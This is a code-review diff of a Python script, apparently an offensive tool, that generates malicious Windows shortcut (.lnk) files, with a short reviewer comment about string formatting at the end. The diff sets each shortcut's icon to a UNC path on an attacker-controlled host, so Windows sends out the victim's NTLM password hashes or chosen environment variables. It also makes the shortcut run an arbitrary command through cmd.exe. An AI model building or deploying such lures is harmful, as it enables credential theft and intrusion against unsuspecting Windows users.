generate.py

```diff
@@ -12,90 +14,136 @@
+        required=True,
+        help='The name of the lnk file'
+    )
+    parser.add_argument(
+        '--execute',
+        metavar='e',
+        default=[r'C:\Windows\System32\explorer.exe .'],
+        nargs='+',
+        help=textwrap.dedent("""\
+            What command should we execute when the shortcut is clicked?
+            Default: None
+        """)
+    )
+    parser.add_argument(
+        '--vars',
+        metavar='r',
+        help=textwrap.dedent("""\
+            What variables should we exfiltrate?
+            Example: "PATH,COMPUTERNAME,USERNAME,NUMBER_OF_PROCESSORS"
+        """)
+    )
+    parser.add_argument(
+        '--type',
+        metavar='t',
+        default='all',
+        choices=('environment', 'ntlm', 'all'),
+        help=textwrap.dedent("""\
+            The payload type to generate. Possible options:
+              * environment - Will exfiltrate specified environment variables
+              * ntlm - Will exfiltrate windows NTLM password hashes
+              * all (default) - Will exfiltrate everything we can
+        """)
+    )
+    args = parser.parse_args()
+    if args.type != 'ntlm' and args.vars is None:
+        raise ValueError(textwrap.dedent("""\
+            You must specify environment variables to exfiltrate using --vars
+            Alternatively, use another payload type with --type
+        """))
+    return args
+
+
+def main(args):
+    target = ' '.join(args.execute)
+
+    if args.type == 'ntlm':
+        icon = r'\\{host}\Share\{filename}.ico'.format(
+            host=args.host,
+            filename=random.randint(0, 50000)
+        )
     else:
-        print("Invalid type given.")
-        print("Valid types are:")
-        print("- environment")
-        print("- ntlm")
-        print("- all")
-        return
+        args.vars = args.vars.replace('%', '').split(' ')
+        path = '\\'.join('%{0}%'.format(w) for w in args.vars)
+        # Some minor anti-caching
+        icon = r'\\{host}\Share\{path}\{filename}.ico'.format(
+            host=args.host,
+            path=path,
+            filename=random.randint(0, 50000)
+        )
+
     if is_windows:
-        ws = win32com.client.Dispatch("wscript.shell")
-        link = ws.CreateShortcut(args.output[0])
-        link.Targetpath = "C:\\Windows\\System32\\cmd.exe"
-        link.Arguments = "/c " + target
+        ws = win32com.client.Dispatch('wscript.shell')
+        link = ws.CreateShortcut(args.output)
+        link.Targetpath = r'C:\Windows\System32\cmd.exe'
+        link.Arguments = '/c ' + target
         link.IconLocation = icon
         link.save()
     else:
-        filepath = os.getcwd() + "/" + (args.output[0])
-        
-        link = for_file("C:\\Windows\\System32\\cmd.exe", filepath)
-        #if not pylnk.check_file_signature(link):
-        #    print("Oh no! The Template.lnk file has been corrupted! Please try redownloading it!")
+        filepath = os.path.join(os.getcwd(), args.output)

```

Comment:
d5a5341
--

I reverted the change by removing `os.path.join`. I did use `str.format` instead of multiple concatenations though (hopefully you don't mind!).